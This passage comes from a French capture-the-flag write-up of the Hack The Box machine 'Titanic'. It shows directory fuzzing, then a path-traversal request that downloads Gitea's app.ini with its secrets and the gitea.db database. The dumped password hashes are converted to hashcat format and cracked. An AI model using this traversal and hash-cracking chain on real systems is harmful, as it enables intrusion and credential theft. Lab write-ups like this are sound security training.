</span></span><span class="line"><span class="cl"> :: Header : Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl"> :: Header : Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span><span class="line"><span class="cl"> :: Follow redirects : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Calibration : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Timeout : <span class="m">10</span> </span></span><span class="line"><span class="cl"> :: Threads : <span class="m">64</span> </span></span><span class="line"><span class="cl"> :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="o">[</span>Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 104ms<span class="o">]</span> </span></span><span class="line"><span class="cl">attachments <span class="o">[</span>Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 149ms<span class="o">]</span> </span></span><span class="line"><span class="cl">avatars <span class="o">[</span>Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 137ms<span class="o">]</span> </span></span><span class="line"><span class="cl">conf <span class="o">[</span>Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 141ms<span class="o">]</span> </span></span><span class="line"><span class="cl">home <span class="o">[</span>Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 156ms<span class="o">]</span> </span></span><span class="line"><span class="cl">log <span class="o">[</span>Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 156ms<span class="o">]</span> </span></span><span class="line"><span class="cl">packages <span class="o">[</span>Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 267ms<span class="o">]</span> </span></span><span class="line"><span class="cl">queues <span class="o">[</span>Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 249ms<span class="o">]</span> </span></span><span class="line"><span class="cl">sessions <span class="o">[</span>Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 225ms<span class="o">]</span> </span></span><span class="line"><span class="cl">tmp <span class="o">[</span>Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 229ms<span class="o">]</span> </span></span><span class="line"><span class="cl">:: Progress: <span class="o">[</span>4614/4614<span class="o">]</span> :: Job <span class="o">[</span>1/1<span class="o">]</span> :: <span class="m">266</span> req/sec :: Duration: <span class="o">[</span>0:00:13<span class="o">]</span> :: Errors: <span class="m">0</span> :: </span></span></code></pre></td></tr></table> </div> </div><p>On observe l&rsquo;utilisation d&rsquo;une &ldquo;gitea_wordlist.txt&rdquo;. Je l&rsquo;ai créer en récupérer le code source sur github, puis j&rsquo;ai utilisé la commande suivante :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">find ./gitea-1.22.1/ -type f -exec basename <span class="o">{}</span> <span class="se">\;</span> &gt; gitea_wordlist.txt </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span><span class="lnt">119 </span><span class="lnt">120 </span><span class="lnt">121 </span><span class="lnt">122 </span><span class="lnt">123 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">GET /download?ticket<span class="o">=</span>/home/developer/gitea/data/gitea/conf/app.ini HTTP/1.1 </span></span><span class="line"><span class="cl">Host: titanic.htb </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:128.0<span class="o">)</span> Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,image/avif,image/webp,image/png,image/svg+xml,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Referer: http://titanic.htb/ </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl">Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">HTTP/1.1 <span class="m">200</span> OK </span></span><span class="line"><span class="cl">Date: Wed, <span class="m">19</span> Feb <span class="m">2025</span> 22:34:22 GMT </span></span><span class="line"><span class="cl">Server: Werkzeug/3.0.3 Python/3.10.12 </span></span><span class="line"><span class="cl">Content-Disposition: attachment<span class="p">;</span> <span class="nv">filename</span><span class="o">=</span><span class="s2">&#34;/home/developer/gitea/data/gitea/conf/app.ini&#34;</span> </span></span><span class="line"><span class="cl">Content-Type: application/octet-stream </span></span><span class="line"><span class="cl">Content-Length: <span class="m">2004</span> </span></span><span class="line"><span class="cl">Last-Modified: Fri, <span class="m">02</span> Aug <span class="m">2024</span> 10:42:14 GMT </span></span><span class="line"><span class="cl">Cache-Control: no-cache </span></span><span class="line"><span class="cl">ETag: <span class="s2">&#34;1722595334.8970726-2004-2176520380&#34;</span> </span></span><span class="line"><span class="cl">Keep-Alive: <span class="nv">timeout</span><span class="o">=</span>5, <span class="nv">max</span><span class="o">=</span><span class="m">100</span> </span></span><span class="line"><span class="cl">Connection: Keep-Alive </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">APP_NAME</span> <span class="o">=</span> Gitea: Git with a cup of tea </span></span><span class="line"><span class="cl"><span class="nv">RUN_MODE</span> <span class="o">=</span> prod </span></span><span class="line"><span class="cl"><span class="nv">RUN_USER</span> <span class="o">=</span> git </span></span><span class="line"><span class="cl"><span class="nv">WORK_PATH</span> <span class="o">=</span> /data/gitea </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>repository<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">ROOT</span> <span class="o">=</span> /data/git/repositories </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>repository.local<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">LOCAL_COPY_PATH</span> <span class="o">=</span> /data/gitea/tmp/local-repo </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>repository.upload<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">TEMP_PATH</span> <span class="o">=</span> /data/gitea/uploads </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>server<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">APP_DATA_PATH</span> <span class="o">=</span> /data/gitea </span></span><span class="line"><span class="cl"><span class="nv">DOMAIN</span> <span class="o">=</span> gitea.titanic.htb </span></span><span class="line"><span class="cl"><span class="nv">SSH_DOMAIN</span> <span class="o">=</span> gitea.titanic.htb </span></span><span class="line"><span class="cl"><span class="nv">HTTP_PORT</span> <span class="o">=</span> <span class="m">3000</span> </span></span><span class="line"><span class="cl"><span class="nv">ROOT_URL</span> <span class="o">=</span> http://gitea.titanic.htb/ </span></span><span class="line"><span class="cl"><span class="nv">DISABLE_SSH</span> <span class="o">=</span> <span class="nb">false</span> </span></span><span class="line"><span class="cl"><span class="nv">SSH_PORT</span> <span class="o">=</span> <span class="m">22</span> </span></span><span class="line"><span class="cl"><span class="nv">SSH_LISTEN_PORT</span> <span class="o">=</span> <span class="m">22</span> </span></span><span class="line"><span class="cl"><span class="nv">LFS_START_SERVER</span> <span class="o">=</span> <span class="nb">true</span> </span></span><span class="line"><span class="cl"><span class="nv">LFS_JWT_SECRET</span> <span class="o">=</span> OqnUg-uJVK-l7rMN1oaR6oTF348gyr0QtkJt-JpjSO4 </span></span><span class="line"><span class="cl"><span class="nv">OFFLINE_MODE</span> <span class="o">=</span> <span class="nb">true</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>database<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">PATH</span> <span class="o">=</span> /data/gitea/gitea.db </span></span><span class="line"><span class="cl"><span class="nv">DB_TYPE</span> <span class="o">=</span> sqlite3 </span></span><span class="line"><span class="cl"><span class="nv">HOST</span> <span class="o">=</span> localhost:3306 </span></span><span class="line"><span class="cl"><span class="nv">NAME</span> <span class="o">=</span> gitea </span></span><span class="line"><span class="cl"><span class="nv">USER</span> <span class="o">=</span> root </span></span><span class="line"><span class="cl"><span class="nv">PASSWD</span> <span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="nv">LOG_SQL</span> <span class="o">=</span> <span class="nb">false</span> </span></span><span class="line"><span class="cl"><span class="nv">SCHEMA</span> <span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="nv">SSL_MODE</span> <span class="o">=</span> disable </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>indexer<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">ISSUE_INDEXER_PATH</span> <span class="o">=</span> /data/gitea/indexers/issues.bleve </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>session<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">PROVIDER_CONFIG</span> <span class="o">=</span> /data/gitea/sessions </span></span><span class="line"><span class="cl"><span class="nv">PROVIDER</span> <span class="o">=</span> file </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>picture<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">AVATAR_UPLOAD_PATH</span> <span class="o">=</span> /data/gitea/avatars </span></span><span class="line"><span class="cl"><span class="nv">REPOSITORY_AVATAR_UPLOAD_PATH</span> <span class="o">=</span> /data/gitea/repo-avatars </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>attachment<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">PATH</span> <span class="o">=</span> /data/gitea/attachments </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>log<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">MODE</span> <span class="o">=</span> console </span></span><span class="line"><span class="cl"><span class="nv">LEVEL</span> <span class="o">=</span> info </span></span><span class="line"><span class="cl"><span class="nv">ROOT_PATH</span> <span class="o">=</span> /data/gitea/log </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>security<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">INSTALL_LOCK</span> <span class="o">=</span> <span class="nb">true</span> </span></span><span class="line"><span class="cl"><span class="nv">SECRET_KEY</span> <span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="nv">REVERSE_PROXY_LIMIT</span> <span class="o">=</span> <span class="m">1</span> </span></span><span class="line"><span class="cl"><span class="nv">REVERSE_PROXY_TRUSTED_PROXIES</span> <span class="o">=</span> * </span></span><span class="line"><span class="cl"><span class="nv">INTERNAL_TOKEN</span> <span class="o">=</span> eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3MjI1OTUzMzR9.X4rYDGhkWTZKFfnjgES5r2rFRpu_GXTdQ65456XC0X8 </span></span><span class="line"><span class="cl"><span class="nv">PASSWORD_HASH_ALGO</span> <span class="o">=</span> pbkdf2 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>service<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">DISABLE_REGISTRATION</span> <span class="o">=</span> <span class="nb">false</span> </span></span><span class="line"><span class="cl"><span class="nv">REQUIRE_SIGNIN_VIEW</span> <span class="o">=</span> <span class="nb">false</span> </span></span><span class="line"><span class="cl"><span class="nv">REGISTER_EMAIL_CONFIRM</span> <span class="o">=</span> <span class="nb">false</span> </span></span><span class="line"><span class="cl"><span class="nv">ENABLE_NOTIFY_MAIL</span> <span class="o">=</span> <span class="nb">false</span> </span></span><span class="line"><span class="cl"><span class="nv">ALLOW_ONLY_EXTERNAL_REGISTRATION</span> <span class="o">=</span> <span class="nb">false</span> </span></span><span class="line"><span class="cl"><span class="nv">ENABLE_CAPTCHA</span> <span class="o">=</span> <span class="nb">false</span> </span></span><span class="line"><span class="cl"><span class="nv">DEFAULT_KEEP_EMAIL_PRIVATE</span> <span class="o">=</span> <span class="nb">false</span> </span></span><span class="line"><span class="cl"><span class="nv">DEFAULT_ALLOW_CREATE_ORGANIZATION</span> <span class="o">=</span> <span class="nb">true</span> </span></span><span class="line"><span class="cl"><span class="nv">DEFAULT_ENABLE_TIMETRACKING</span> <span class="o">=</span> <span class="nb">true</span> </span></span><span class="line"><span class="cl"><span class="nv">NO_REPLY_ADDRESS</span> <span class="o">=</span> noreply.localhost </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>lfs<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">PATH</span> <span class="o">=</span> /data/git/lfs </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>mailer<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">ENABLED</span> <span class="o">=</span> <span class="nb">false</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>openid<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">ENABLE_OPENID_SIGNIN</span> <span class="o">=</span> <span class="nb">true</span> </span></span><span class="line"><span class="cl"><span class="nv">ENABLE_OPENID_SIGNUP</span> <span class="o">=</span> <span class="nb">true</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>cron.update_checker<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">ENABLED</span> <span class="o">=</span> <span class="nb">false</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>repository.pull-request<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">DEFAULT_MERGE_STYLE</span> <span class="o">=</span> merge </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>repository.signing<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">DEFAULT_TRUST_MODEL</span> <span class="o">=</span> committer </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>oauth2<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="nv">JWT_SECRET</span> <span class="o">=</span> FIAOKLQX4SBzvZ9eZnHYLTCiVGoBtkE4y5B7vMjzz3g </span></span></code></pre></td></tr></table> </div> </div><h3 id="giteadb--developer-user">Gitea.db : developer user </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">curl <span class="s2">&#34;http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/gitea.db&#34;</span> --output ./gitea.db </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Titanic<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ sqlite3 ./gitea.db </span></span><span class="line"><span class="cl">SQLite version 3.46.1 2024-08-13 09:16:08 </span></span><span class="line"><span class="cl">Enter <span class="s2">&#34;.help&#34;</span> <span class="k">for</span> usage hints. </span></span><span class="line"><span class="cl">sqlite&gt; <span class="k">select</span> * from user<span class="p">;</span> </span></span><span class="line"><span class="cl">1<span class="p">|</span>administrator<span class="p">|</span>administrator<span class="o">||</span>root@titanic.htb<span class="p">|</span>0<span class="p">|</span>enabled<span class="p">|</span>cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136<span class="p">|</span>pbkdf2<span class="nv">$50000$50</span><span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="o">||</span>0<span class="o">||</span><span class="p">|</span>70a5bd0c1a5d23caa49030172cdcabdc<span class="p">|</span>2d149e5fbd1b20cf31db3e3c6a28fc9b<span class="p">|</span>en-US<span class="o">||</span>1722595379<span class="p">|</span>1722597477<span class="p">|</span>1722597477<span class="p">|</span>0<span class="p">|</span>-1<span class="p">|</span>1<span class="p">|</span>1<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>1<span class="p">|</span>0<span class="p">|</span>2e1e70639ac6b0eecbdab4a3d19e0f44<span class="p">|</span>root@titanic.htb<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="o">||</span>gitea-auto<span class="p">|</span><span class="m">0</span> </span></span><span class="line"><span class="cl">2<span class="p">|</span>developer<span class="p">|</span>developer<span class="o">||</span>developer@titanic.htb<span class="p">|</span>0<span class="p">|</span>enabled<span class="p">|</span>e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56<span class="p">|</span>pbkdf2<span class="nv">$50000$50</span><span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="o">||</span>0<span class="o">||</span><span class="p">|</span>0ce6f07fc9b557bc070fa7bef76a0d15<span class="p">|</span>8bf3e3452b78544f8bee9400d6936d34<span class="p">|</span>en-US<span class="o">||</span>1722595646<span class="p">|</span>1722603397<span class="p">|</span>1722603397<span class="p">|</span>0<span class="p">|</span>-1<span class="p">|</span>1<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>1<span class="p">|</span>0<span class="p">|</span>e2d95b7e207e432f62f3508be406c11b<span class="p">|</span>developer@titanic.htb<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>2<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="o">||</span>gitea-auto<span class="p">|</span><span class="m">0</span> </span></span><span class="line"><span class="cl">3<span class="p">|</span>a<span class="p">|</span>a<span class="o">||</span>a@a.com<span class="p">|</span>0<span class="p">|</span>enabled<span class="p">|</span>0ae3825641016406643a122f7f3ca6c6b5cfc76abd40075f73eb8deff4cce5448bfa95dc5a4ff81d62cb77921cd224b2010d<span class="p">|</span>pbkdf2<span class="nv">$50000$50</span><span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="o">||</span>0<span class="o">||</span><span class="p">|</span>314efc292d5e9576a2154e9bc85facb8<span class="p">|</span>24fc79c6b2aadeb9555d40312ac55460<span class="p">|</span>en-US<span class="o">||</span>1739990352<span class="p">|</span>1739990365<span class="p">|</span>1739990352<span class="p">|</span>0<span class="p">|</span>-1<span class="p">|</span>1<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>1<span class="p">|</span>0<span class="p">|</span>d10ca8d11301c2f4993ac2279ce4b930<span class="p">|</span>a@a.com<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="o">||</span>gitea-auto<span class="p">|</span><span class="m">0</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="hashcat-bruteforce">Hashcat bruteforce </h3><p>compte crée: b : 123456789</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">4<span class="p">|</span>b<span class="p">|</span>b<span class="o">||</span>b@b.com<span class="p">|</span>0<span class="p">|</span>enabled<span class="p">|</span>097c3c0cdbf50b536b20ef5e22b6dd8e58fbfa6230003f60a6a15577107d48618814da5e1c2984e3775fdbea3f61c41cd0ce<span class="p">|</span>pbkdf2<span class="nv">$50000$50</span><span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="o">||</span>0<span class="o">||</span><span class="p">|</span>d49587abbc61243dfde5146bec7ee24b<span class="p">|</span>47b1683e379bca325752efd85fe1c31b<span class="p">|</span>en-US<span class="o">||</span>1740008072<span class="p">|</span>1740008072<span class="p">|</span>1740008072<span class="p">|</span>0<span class="p">|</span>-1<span class="p">|</span>1<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>1<span class="p">|</span>0<span class="p">|</span>2076105f6efe7c11e285add95f514b9a<span class="p">|</span>b@b.com<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="p">|</span>0<span class="o">||</span>gitea-auto<span class="p">|</span><span class="m">0</span> </span></span></code></pre></td></tr></table> </div> </div><p>┌──(kali㉿kali)-[~/htb/Titanic] └─$ john &ndash;list=format-details &ndash;format=pbkdf2-hmac-sha256</p> <p>PBKDF2-HMAC-SHA256 125 24 192 01000003 48 PBKDF2-SHA256 256/256 AVX2 8x 0x107 32 188 iteration count 0 $pbkdf2-sha256$1000$b1dWS2dab3dKQWhPSUg3cg$UY9j5wlyxtsJqhDKTqua8Q3fMp0ojc2pOnErzr8ntLE</p> <p>sqlite&gt; select name, passwd_hash_algo, salt, passwd from user; administrator|pbkdf2$50000$50|2d149e5fbd1b20cf31db3e3c6a28fc9b|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136 developer|pbkdf2$50000$50|8bf3e3452b78544f8bee9400d6936d34|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56 a|pbkdf2$50000$50|24fc79c6b2aadeb9555d40312ac55460|0ae3825641016406643a122f7f3ca6c6b5cfc76abd40075f73eb8deff4cce5448bfa95dc5a4ff81d62cb77921cd224b2010d b|pbkdf2$50000$50|47b1683e379bca325752efd85fe1c31b|097c3c0cdbf50b536b20ef5e22b6dd8e58fbfa6230003f60a6a15577107d48618814da5e1c2984e3775fdbea3f61c41cd0ce</p> <p>Ce qui nous donne :</p> <p>sha256:50000:2d149e5fbd1b20cf31db3e3c6a28fc9b:cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136 sha256:50000:8bf3e3452b78544f8bee9400d6936d34:e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56 sha256:50000:24fc79c6b2aadeb9555d40312ac55460:0ae3825641016406643a122f7f3ca6c6b5cfc76abd40075f73eb8deff4cce5448bfa95dc5a4ff81d62cb77921cd224b2010d sha256:50000:47b1683e379bca325752efd85fe1c31b:097c3c0cdbf50b536b20ef5e22b6dd8e58fbfa6230003f60a6a15577107d48618814da5e1c2984e3775fdbea3f61c41cd0ce</p> <p>Enfin, en format hashcat avec du base64:</p> <p>sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY= sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y= sha256:50000:JPx5xrKq3rlVXUAxKsVUYA==:CuOCVkEBZAZkOhIvfzymxrXPx2q9QAdfc+uN7/TM5USL+pXcWk/4HWLLd5Ic0iSyAQ0= sha256:50000:R7FoPjebyjJXUu/YX+HDGw==:CXw8DNv1C1NrIO9eIrbdjlj7+mIwAD9gpqFVdxB9SGGIFNpeHCmE43df2+o/YcQc0M4=</p> <p>On trouve ensuite le mot de passe developer en utilisant hashcat :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ hashcat -m <span class="m">10900</span> hash_final.txt.b64 ~/wordlists/rockyou.txt </span></span><span class="line"><span class="cl">hashcat <span class="o">(</span>v6.2.5<span class="o">)</span> starting </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Dictionary cache hit: </span></span><span class="line"><span class="cl">* Filename..: /home/leopold/wordlists/rockyou.txt </span></span><span class="line"><span class="cl">* Passwords.: <span class="m">14344385</span> </span></span><span class="line"><span class="cl">* Bytes.....: <span class="m">139922195</span> </span></span><span class="line"><span class="cl">* Keyspace..: <span class="m">14344385</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">sha256:50000:i/PjRSt4VE+L7pQA1pNtNA<span class="o">==</span>:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y<span class="o">=</span>:25282528 </span></span></code></pre></td></tr></table> </div> </div><p>developer : <code>25282528</code></p> <h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="exploitation--image-magick">Exploitation : Image Magick </h3><p><a class="link" href="https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8rxc-922v-phg8" 